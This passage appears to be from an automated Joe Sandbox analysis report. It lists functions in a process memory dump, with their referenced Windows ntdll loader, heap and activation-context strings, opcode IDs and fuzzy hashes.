                                                                                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                          • API String ID: 0-1239276146
                                                                                                                                                                                                          • Opcode ID: 0bfee9ac4efef2b55036ed9f77877cc6181bf13adbf035a7689f6a54f8f90d79
                                                                                                                                                                                                          • Instruction ID: ba9914489aa4e7db1bd2f46daff6e65c7efb1d2c5f48efc6261f41f06b184dae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bfee9ac4efef2b55036ed9f77877cc6181bf13adbf035a7689f6a54f8f90d79
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69A1B136A0022ADBDB25CF59C884BA9B7B5BF59354F1445EAD908AF291D7309EC0CF90
                                                                                                                                                                                                          Function 01524AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01563437
                                                                                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01563456
                                                                                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 01563425, 01563432, 01563451
                                                                                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0156342A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                                          • API String ID: 0-1245972979
                                                                                                                                                                                                          • Opcode ID: 1856275a4019be76f5c95e84b0acc8ead5402b4d450f72aa846abaced24a8eb3
                                                                                                                                                                                                          • Instruction ID: d55f2521b3351f792b697d63d2ca59689f2cf6519427d334eecde51707717b12
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1856275a4019be76f5c95e84b0acc8ead5402b4d450f72aa846abaced24a8eb3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 636113326007229BDB22CF1DC845B2AF7E5BF81B11F14852DE999AF290DB70E801CBD1
                                                                                                                                                                                                          Function 014F64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01550FE5
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015510AE
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01551028
                                                                                                                                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0155106B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                                                                          • API String ID: 0-1468400865
                                                                                                                                                                                                          • Opcode ID: 4000b081992b0d1044ad41c278f7c82056a0f715dec0deda896944f9c3f19416
                                                                                                                                                                                                          • Instruction ID: a0fc867e7511caf06fa0dbb83c2606ce2909774a1b568decf587fcc21df6f650
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4000b081992b0d1044ad41c278f7c82056a0f715dec0deda896944f9c3f19416
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC71CFB19043069FCB21DF14D889B9B7FA8BF94764F40046AFA489F296D334D589CBD1
                                                                                                                                                                                                          Function 0151245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • apphelp.dll, xrefs: 01512462
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0155A9A2
                                                                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0155A992
                                                                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 0155A998
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-176724104
                                                                                                                                                                                                          • Opcode ID: d6596a9578ee6781e91f5238a4bf228bf067e00c343ea3371dbae714354e816c
                                                                                                                                                                                                          • Instruction ID: c261409988f29a6da2112d34f1bc3bea373c1b3a72441734a4529abc2a841af1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6596a9578ee6781e91f5238a4bf228bf067e00c343ea3371dbae714354e816c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A318875E40202ABEB7A9F59D895EAE7BF5FB84B00F23011FE9106F259C7B05845DB80
                                                                                                                                                                                                          Function 015029A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • HEAP[%wZ]: , xrefs: 01503255
                                                                                                                                                                                                          • HEAP: , xrefs: 01503264
                                                                                                                                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0150327D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                                                          • API String ID: 0-617086771
                                                                                                                                                                                                          • Opcode ID: f74188b227dc740bb1e5c32fa22847c19c0ab0d1ffcb90e82ff2ca0ea1dcbbec
                                                                                                                                                                                                          • Instruction ID: 84f54939a3d76eeb3a6ccf8b19ce31e4204b704291dc4556b5409434523bf847
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f74188b227dc740bb1e5c32fa22847c19c0ab0d1ffcb90e82ff2ca0ea1dcbbec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA92CB71A046499FDB26CFA8C4447AEBBF1FF48300F188499E85AAF391D735A945CF50
                                                                                                                                                                                                          Function 01500770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                                                                                          • Opcode ID: 4218648ec93079bf50c120ddab04b90264d75082748c88c8d4e5a56539fdeecf
                                                                                                                                                                                                          • Instruction ID: 080465ecc2660e0d1eadd646be2a3dd2b79ec7b391c08e9c6ad042fb5b61524e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4218648ec93079bf50c120ddab04b90264d75082748c88c8d4e5a56539fdeecf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F18A30A00606DFEB16CFA8C894B6EBBF5FF84340F148569E9569F291D734E981CB90
                                                                                                                                                                                                          Function 01516962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: $@
                                                                                                                                                                                                          • API String ID: 0-1077428164
                                                                                                                                                                                                          • Opcode ID: b546b171749363d0aa35ffb9b5ca63552014e252f44bfa227b4d9a1c2f2cf599
                                                                                                                                                                                                          • Instruction ID: 78c2facc72d5a4e30a03e5e84bcb3b0fcbc7928f55952a1cb5d86385476e67bb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b546b171749363d0aa35ffb9b5ca63552014e252f44bfa227b4d9a1c2f2cf599
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5C28D716083419FE766CF28C890BAFBBE5BF88714F04892EE9898B245D774D845CB52
                                                                                                                                                                                                          Function 014EA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                          • API String ID: 0-2779062949
                                                                                                                                                                                                          • Opcode ID: 816869b1ae1c224a42de36b1d5a392e265428c8ec1188c5e30cd24db43303136
                                                                                                                                                                                                          • Instruction ID: c36db4f43d0a879cf110fa697a57822c85de368283dffb40fdbb0ef45d46a789
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 816869b1ae1c224a42de36b1d5a392e265428c8ec1188c5e30cd24db43303136
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDA17F7191162A9BDB31DF64CC88BAEB7B8FF84705F1001EAE909AB250D7359E85CF50
                                                                                                                                                                                                          Function 01510BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0155A121
                                                                                                                                                                                                          • LdrpCheckModule, xrefs: 0155A117
                                                                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 0155A10F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-161242083
                                                                                                                                                                                                          • Opcode ID: ba6319a4d7e054c51295800fa7bfd5660f2cfc636fcc28746a4593908eb4fdb6
                                                                                                                                                                                                          • Instruction ID: 3983f7fdf5614b7a9df0bf75e471f442ab3acef5ba877026cf1fab3acb8754e6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba6319a4d7e054c51295800fa7bfd5660f2cfc636fcc28746a4593908eb4fdb6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D271E00206DFDB2ADF68C990ABEB7F4FB84208F15446EE9119F255E734A985CB50
                                                                                                                                                                                                          Function 01500A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                          • API String ID: 0-1334570610
                                                                                                                                                                                                          • Opcode ID: 9fe636a4c1a3c290df5788d39fc805d30d0fc62ac0129c10e07aafe0578e6f49
                                                                                                                                                                                                          • Instruction ID: fc4509d6b0502315c05dd30af9ff5a1f078c47fbd58a4356bb1d327952a4f7f7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe636a4c1a3c290df5788d39fc805d30d0fc62ac0129c10e07aafe0578e6f49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1661BD306107029FDB2ACF68C484B6ABBE1FF45744F15856EE8598F2D2D7B0E881CB91
                                                                                                                                                                                                          Function 0152C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 015682DE
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015682E8
                                                                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 015682D7
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-1783798831
                                                                                                                                                                                                          • Opcode ID: bf690200ed9f4188f0a51f9300646ff6fd8e9bed806411e860ae95e78bbf6cdd
                                                                                                                                                                                                          • Instruction ID: 991ce2949f06e99a4104b387a28ecdeade505693682ae07128b1244f3d2d9856
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf690200ed9f4188f0a51f9300646ff6fd8e9bed806411e860ae95e78bbf6cdd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6412FB2950312ABCB35EF68D844B5F77E8BF99650F05082EF954CF2A1E770D8048B91
                                                                                                                                                                                                          Function 015AC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • PreferredUILanguages, xrefs: 015AC212
                                                                                                                                                                                                          • @, xrefs: 015AC1F1
                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 015AC1C5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                          • API String ID: 0-2968386058
                                                                                                                                                                                                          • Opcode ID: 713761c8995b23ac772ab1f6625ea55abeda3e349cf1af1b89958d27da1197a6
                                                                                                                                                                                                          • Instruction ID: fdefcd8a75886b2191602529dce59e29bd85bcfb00b54217fad27a311ccb46c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 713761c8995b23ac772ab1f6625ea55abeda3e349cf1af1b89958d27da1197a6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36416072E5020AEBDF11DAD8C891FEEBBF8BF54700F54406AE649FB290D7749A448B50
                                                                                                                                                                                                          Function 01584144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                          • API String ID: 0-1373925480
                                                                                                                                                                                                          • Opcode ID: 4a5eb9d387d8fe862e755fd7c2c335600b1ef0c52ed5f03122c629b7a6186818
                                                                                                                                                                                                          • Instruction ID: db4b0308c865bc408467ab8df5e25760b8ec3e9cc7b4a57291f58732c6d19492
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a5eb9d387d8fe862e755fd7c2c335600b1ef0c52ed5f03122c629b7a6186818
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6041B232A0465A8FEB26EBE9C844BADBBB4BFA5344F14045ADD02BF791D7348901CB51
                                                                                                                                                                                                          Function 01574755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01574888
                                                                                                                                                                                                          • LdrpCheckRedirection, xrefs: 0157488F
                                                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01574899
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                          • API String ID: 0-3154609507
                                                                                                                                                                                                          • Opcode ID: b855c14e63c875b8d365a53458b51b3548e271bb0e3b9bc9a90d54a8962835df
                                                                                                                                                                                                          • Instruction ID: cbc47e5d308ddcfaf946e2ede220bc046fc72f040d9764bc8571f993608451b8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b855c14e63c875b8d365a53458b51b3548e271bb0e3b9bc9a90d54a8962835df
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9541B272A04665DFCB21CE6DE842A2ABBE4FF89A50F06056DED59DF312D730D801CB91
                                                                                                                                                                                                          Function 01500BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                          • API String ID: 0-2558761708
                                                                                                                                                                                                          • Opcode ID: 7dddc056a0a0e07689555ecb997e64fd97493cbbb2f7bf246376c07e9918a166
                                                                                                                                                                                                          • Instruction ID: edc27a27b4648677b5d94fdfb489dd5e069db566c04aba88354fcda4d3786927
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dddc056a0a0e07689555ecb997e64fd97493cbbb2f7bf246376c07e9918a166
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E211CD30324542CFDB5ACA188465B2AB7E5FF40A16F18841AE8068F2A1E730E841C740
                                                                                                                                                                                                          Function 015720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Process initialization failed with status 0x%08lx, xrefs: 015720F3
                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01572104
                                                                                                                                                                                                          • LdrpInitializationFailure, xrefs: 015720FA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                          • API String ID: 0-2986994758
                                                                                                                                                                                                          • Opcode ID: cd93c2e40ffafe02a449ff3d5f304ffe1f071caa231033b589b2f51f99c5364f
                                                                                                                                                                                                          • Instruction ID: 338ee929f015f08ea70f3ee78ca61fd39b10e4268d1a6bdbea6cd43f7bfbadce
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd93c2e40ffafe02a449ff3d5f304ffe1f071caa231033b589b2f51f99c5364f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89F0C875A403096BEB24D64DEC57F9937A8FB81B54F11005DF6006F291D2F0A504C691
                                                                                                                                                                                                          Function 015003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: #%u
                                                                                                                                                                                                          • API String ID: 48624451-232158463
                                                                                                                                                                                                          • Opcode ID: d17e8b0fdcc6b41c7add7b22904c5e5640f1d97e67cdc05cd42c6278a0804fb8
                                                                                                                                                                                                          • Instruction ID: 5c59b4f5fe1e2652a9edc48da1d36d6d4d04503d5024ada3a1b17f5990af8032
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d17e8b0fdcc6b41c7add7b22904c5e5640f1d97e67cdc05cd42c6278a0804fb8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39715C72A0014A9FDB06DFA8C991BAEB7F8FF58344F154065E905EB291EB34ED41CB60
                                                                                                                                                                                                          Function 014FA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • LdrResSearchResource Exit, xrefs: 014FAA25
                                                                                                                                                                                                          • LdrResSearchResource Enter, xrefs: 014FAA13
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                                                                          • API String ID: 0-4066393604
                                                                                                                                                                                                          • Opcode ID: 0d902409d766f5abc8ac245cc24e9d1906d492c0666c8a0113398fad7f342ead
                                                                                                                                                                                                          • Instruction ID: 9b8c1a3f7c0ce7771ec3727cd348897e0c232414093f3423b7fed1681b8c26fb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d902409d766f5abc8ac245cc24e9d1906d492c0666c8a0113398fad7f342ead
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92E19071E002099FEF62CE99C990BAEBBB9BF44350F20442BEE15EB361D7749845CB50
                                                                                                                                                                                                          Function 015BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: `$`
                                                                                                                                                                                                          • API String ID: 0-197956300
                                                                                                                                                                                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                          • Instruction ID: 1ff60d68399cdbb7d039c1cbf56a86db84c35925e9d61024b4538950b7255819
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1C1C1712043469BEB25CF28C881BABBBE5BFC4318F184A2DF6968F290D775D505CB91
                                                                                                                                                                                                          Function 0156E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                                                                                          • Opcode ID: cffad72ad3a3d3965469ba782b9ea190e9ea9e2b68b084d664cecbc687274900
                                                                                                                                                                                                          • Instruction ID: 8bf36eb769a35faf354d4f57c004f6ea813cd5c5c92065551adb87ef62659e2c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cffad72ad3a3d3965469ba782b9ea190e9ea9e2b68b084d664cecbc687274900
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE616C75E012099FDB25DFA8C841BAEBBF9FB44700F24446EE649EF291D731A940CB90
                                                                                                                                                                                                          Function 015943D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_14c0000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: @$MUI
                                                                                                                                                                                                          • API String ID: 0-17815947
                                                                                                                                                                                                          • Opcode ID: 68aa83c4959b96fc0a8f970e875d920e2cfa6426488b7bc62afcf521a91a8f26
